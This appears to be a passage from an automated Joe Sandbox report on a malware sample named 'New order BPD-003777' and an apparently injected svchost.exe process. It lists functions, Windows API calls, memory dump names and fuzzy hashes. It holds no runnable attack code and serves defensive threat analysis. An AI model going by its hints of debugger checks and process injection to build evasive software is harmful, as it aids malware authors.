_wcslen.LIBCMT ref: 002EDFE2
_wcslen.LIBCMT ref: 002EE00D
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 002EE018

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: f7a6905661a125863820d4e1ceb344b947f23c81d23b5f0d2e183391a8ad12be
Instruction ID: 6ac823ed2fe04d415c59abb597ecbf3a84a72f55b89c172cf579b9ef0fcd3368
Opcode Fuzzy Hash: f7a6905661a125863820d4e1ceb344b947f23c81d23b5f0d2e183391a8ad12be
Instruction Fuzzy Hash: 2A21D375950215AFCB11EFA8D981BAEB7F8EF86710F144064E805BB281DA70DE508FA1

Function 0028600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
GetStockObject.GDI32(00000011), ref: 00286060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 351ecd7d4e783a412b133e2500ca6e872025d1d0c191558d6ed80db4e2929757
Instruction ID: b0c6b79039b162c662eb84d93bcfe19a330295346bdd1518eb5d7f182e3dd3d4
Opcode Fuzzy Hash: 351ecd7d4e783a412b133e2500ca6e872025d1d0c191558d6ed80db4e2929757
Instruction Fuzzy Hash: B411AD72122509BFEF126FA48C48EEABB6DFF0C3A4F044215FA04521A0C7729C60DBA0

Function 002A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 002A3B56

Part of subcall function 002A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 002A3AD2
Part of subcall function 002A3AA3: ___AdjustPointer.LIBCMT ref: 002A3AED

_UnwindNestedFrames.LIBCMT ref: 002A3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 002A3B7C
CallCatchBlock.LIBVCRUNTIME ref: 002A3BA4

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 40769a1b0e52a115f3f79f3415afe72b9735f75b4b95c297733a64b699c524d4
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: BF012932110149BBDF12AE95DC42EEB7F6AEF8A758F044414FE4856121CB72E971DFA0

Function 00317E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00317E33
ScreenToClient.USER32(?,?), ref: 00317E4B
ScreenToClient.USER32(?,?), ref: 00317E6F
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00317E8A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 8a925520854b0c60c42e13dbc07836ff564b1913526b5d2eaca027bcf342ae1f
Instruction ID: fc05a63e63e9865b64ec79099d35fede4f39bf16adbb83be232b318255ae2e1c
Opcode Fuzzy Hash: 8a925520854b0c60c42e13dbc07836ff564b1913526b5d2eaca027bcf342ae1f
Instruction Fuzzy Hash: 051140B9D0020AAFDB41CF98C884AEEBBF9FB08310F509066E915E2210D775AA54CF90

Function 00318863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00299639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996A2
Part of subcall function 00299639: BeginPath.GDI32(?), ref: 002996B9
Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00318887
LineTo.GDI32(?,?,?), ref: 00318894
EndPath.GDI32(?), ref: 003188A4
StrokePath.GDI32(?), ref: 003188B2

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 88510dd38281c4ff9d2f4a2e37f5b49043ecf76b3b05beb1b1d01c26b1cb39bc
Instruction ID: 1dc61fb469f0123d9fb817e9c60bda0b07290cc7eb1884e7b2d8bf1322792cd0
Opcode Fuzzy Hash: 88510dd38281c4ff9d2f4a2e37f5b49043ecf76b3b05beb1b1d01c26b1cb39bc
Instruction Fuzzy Hash: 95F03A36091258BADB135F98AC0AFCA3B5DAF0E311F048000FA11650E1C7755561CFE9

Function 002998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 002998CC
SetTextColor.GDI32(?,?), ref: 002998D6
SetBkMode.GDI32(?,00000001), ref: 002998E9
GetStockObject.GDI32(00000005), ref: 002998F1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: aa8bc498d96ff9290b48f9999aef0e785fb1d7da0aa2b843d3b955483f1636d7
Instruction ID: 5cd1e064ae4ca5672120d1a074d56f98bbe0e6292f758eb3d2420d8f12bffaba
Opcode Fuzzy Hash: aa8bc498d96ff9290b48f9999aef0e785fb1d7da0aa2b843d3b955483f1636d7
Instruction Fuzzy Hash: 68E065312D4240BADB225F74BC09BD83F25AB16335F14D22AF6F5540E1C37146509B11

Function 00307771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,0031CC08,?,?), ref: 003078DD

Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A

CharUpperBuffW.USER32(?,?,?,0031CC08,00000000,?,?), ref: 0030783B

Strings

<s4, xrefs: 0030790C, 0030790F, 00307924

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s4
API String ID: 3544283678-4153809766
Opcode ID: 115a1ab95b19fb11e6a0e84a2c33a2e29ecfdad134e2ec41b6fa123625d7c14d
Instruction ID: cf37464b5bfcf70caa42f9693a060d2c4a24b25540709993589458db2c81c8f4
Opcode Fuzzy Hash: 115a1ab95b19fb11e6a0e84a2c33a2e29ecfdad134e2ec41b6fa123625d7c14d
Instruction Fuzzy Hash: 73617D3A926119EBCF06FBA4CCA1DFDB378BF14700B444125E502B70D1EF246A55CBA0

Function 0029E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0029E1B1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a201b60886426c4a7d212fd83d8d9312275b42eff1c9f2e1c2cce06dfc50b809
Instruction ID: ecf9dcedfda360d5d599c398c82c33bdbe107e2fc9c6371b2b0b68093457d3e6
Opcode Fuzzy Hash: a201b60886426c4a7d212fd83d8d9312275b42eff1c9f2e1c2cce06dfc50b809
Instruction Fuzzy Hash: DA510175924247DFEF15EF28C4816FABBA8EF29310F254056EC919F2D0D6309D62CBA0

Function 0029F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0029F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0029F2BB

Strings

@, xrefs: 0029F2AF

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 73bda334646c1ac553064c7fbc4745a7db2a947cd2a08db2113860978bec81b7
Instruction ID: 3cd63e09f668766455e89a8202b5ff5d67a307974234afe77f6144ab1c8fa39f
Opcode Fuzzy Hash: 73bda334646c1ac553064c7fbc4745a7db2a947cd2a08db2113860978bec81b7
Instruction Fuzzy Hash: 665138714197449BE320AF10E886BABBBF8FF94304F91885DF199511A5EB308539CB66

Function 00305745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?), ref: 003057E0
_wcslen.LIBCMT ref: 003057EC

Strings

CALLARGARRAY, xrefs: 003057E6, 003057EB

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: ee126b4a163e7fab19abd6ca9baadd8b0ad5b5df73b5a626cbb6aea8c930dea4
Instruction ID: ee8223246584d176ebb26f6f2cc8a0c79d73ddbc70e64f175ceab151036085b7
Opcode Fuzzy Hash: ee126b4a163e7fab19abd6ca9baadd8b0ad5b5df73b5a626cbb6aea8c930dea4
Instruction Fuzzy Hash: 9841BD31A112099FCB05EFA9C8958BFBBB9FF59320F158069E905A7291E730DD81CF90

Function 00318172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00353018,0035305C), ref: 003181BF
CloseHandle.KERNEL32 ref: 003181D1

Strings

\05, xrefs: 0031818A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \05
API String ID: 3712363035-320011286
Opcode ID: b88a73e5ee1598d760110b9ddbafc24478cc1136027d02b2bd1061f055d7f679
Instruction ID: 4807b4a30dbcd96d832ce82f2e0b69c1225c3d749b9596ddff81b1b9fea3bcb7
Opcode Fuzzy Hash: b88a73e5ee1598d760110b9ddbafc24478cc1136027d02b2bd1061f055d7f679
Instruction Fuzzy Hash: B0F05EF5650300BBE6226765AC45FB73A5CDB09792F004460BB09D61F2D6798A1486B8

Function 002A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0029F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00350A88,00000000,00350A74,002A0D71,?,?,?,0028100A), ref: 0029F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0028100A), ref: 002A0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0028100A), ref: 002A0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002A0D7F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 694775288eb4e997a84c2bd75ad9528063bddc7fabc190605a9e2f8fdfa4b6aa
Instruction ID: d990cc0acbb537bf03c067d4501503ef954e63116967982181e0fd89df954f7d
Opcode Fuzzy Hash: 694775288eb4e997a84c2bd75ad9528063bddc7fabc190605a9e2f8fdfa4b6aa
Instruction Fuzzy Hash: 62E06D78610B018FE7619FB8D4487927BE4EB09740F008D2DE486C6665DBB4E4988BA1

Function 0029E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0029E3D5

Strings

8%5, xrefs: 0029E3CA
0%5, xrefs: 0029E3B5

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%5$8%5
API String ID: 1385522511-2965848538
Opcode ID: ddf42806a33a08e46e0710d9e8269fd26c18e132771191121f837db2b372094d
Instruction ID: 20571d83e335fe4fffe0b0da62fb8992b144df35b1157ca8a547828224f471b8
Opcode Fuzzy Hash: ddf42806a33a08e46e0710d9e8269fd26c18e132771191121f837db2b372094d
Instruction Fuzzy Hash: 12E04F35434A108BCE06EF18F895EAAB359AB17321B5219A9E5128B1A1AB7028918A59

Analysis Process: svchost.exePID: 7572, Parent PID: 7548COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.7%
Total number of Nodes:	106
Total number of Limit Nodes:	7

Executed Functions

Function 00717823 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00717895

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a1becba5c8c8cabc2e01c087e7877055152ed7ce1b87e3564bd628a7dfcc5aab
Instruction ID: 739b777eeef193332b67cd1a8026e669a821caacf816a95f929d8afcbbe2eecb
Opcode Fuzzy Hash: a1becba5c8c8cabc2e01c087e7877055152ed7ce1b87e3564bd628a7dfcc5aab
Instruction Fuzzy Hash: 670121B5E4020DABDF14EBE4DC46FDEB7B89B54304F0081A5E91897280F675EB58CB91

Function 0072C803 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00724AF4,?,00000000,?,?,00724AF4,?,0000F71F), ref: 0072C837

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d72440d65b0c06861669640819b658a19e7f91c22ad93aaab60b09b481231f25
Instruction ID: afbc1aa6bb406961a711ebd3daa1489635ed63624252d6002a28131ac7741666
Opcode Fuzzy Hash: d72440d65b0c06861669640819b658a19e7f91c22ad93aaab60b09b481231f25
Instruction Fuzzy Hash: DBE04672244214BBD620EA5AEC42F9B77AEDBC5750F408015FA08AB242C6B1BA1286A1

Function 03272B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03272B6A

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b025d77a62f11f1eed1e72328b4ee612aa43932efe92562fd581d1c1ce5a9e6b
Instruction ID: c7c6ad0d887ab70681d3940a12e824ee390e4210c3010d7f8b001f408adcd377
Opcode Fuzzy Hash: b025d77a62f11f1eed1e72328b4ee612aa43932efe92562fd581d1c1ce5a9e6b
Instruction Fuzzy Hash: 54900261213404035105B2584454656400B87E0301B95C021E2014598DC62589D16125

Function 03272DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03272DFA

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1bf2e23e992389d684ef805eb616a84f4230a3a988c937a80146f9fe93ede7d5
Instruction ID: 08c92f790d007ad213cf6d198576e32fdb5c158c7133fcdbee90ef2e3630f501
Opcode Fuzzy Hash: 1bf2e23e992389d684ef805eb616a84f4230a3a988c937a80146f9fe93ede7d5
Instruction Fuzzy Hash: C890023121240813E111B2584544747000A87D0341FD5C412A142455CD97568A92A121

Function 032735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 032735CA

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6d2d24d0db3aa230777b4b6dc25a546a83c3edb711e036764e12e59dc01656c
Instruction ID: ab8cde747b1b756ad01261f2889df7f3f53fa2455326dc5a8d6216f9f210b343
Opcode Fuzzy Hash: c6d2d24d0db3aa230777b4b6dc25a546a83c3edb711e036764e12e59dc01656c
Instruction Fuzzy Hash: 7690023161650802E100B2584554746100687D0301FA5C411A142456CD87958A9165A2

Function 00713F19 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0507P35R, xrefs: 007140AF, 007140B9, 007140CA
0507P35R, xrefs: 007140C1, 007140C4

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: 0507P35R$0507P35R
API String ID: 0-2323980509
Opcode ID: e367d86bc842ba436e5a91b55d6332ca6e7c780b4e3f851f9f5688e2ae4316b1
Instruction ID: f5a87619d450a2808e9d83382fa51823d718221da3e4dd7eb6fac1693207236c
Opcode Fuzzy Hash: e367d86bc842ba436e5a91b55d6332ca6e7c780b4e3f851f9f5688e2ae4316b1
Instruction Fuzzy Hash: BF31153384425DAFDB218B68EC418DEB7B8FE86350B0846D9F569DB141D3299E43CBD1

Function 0071403C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

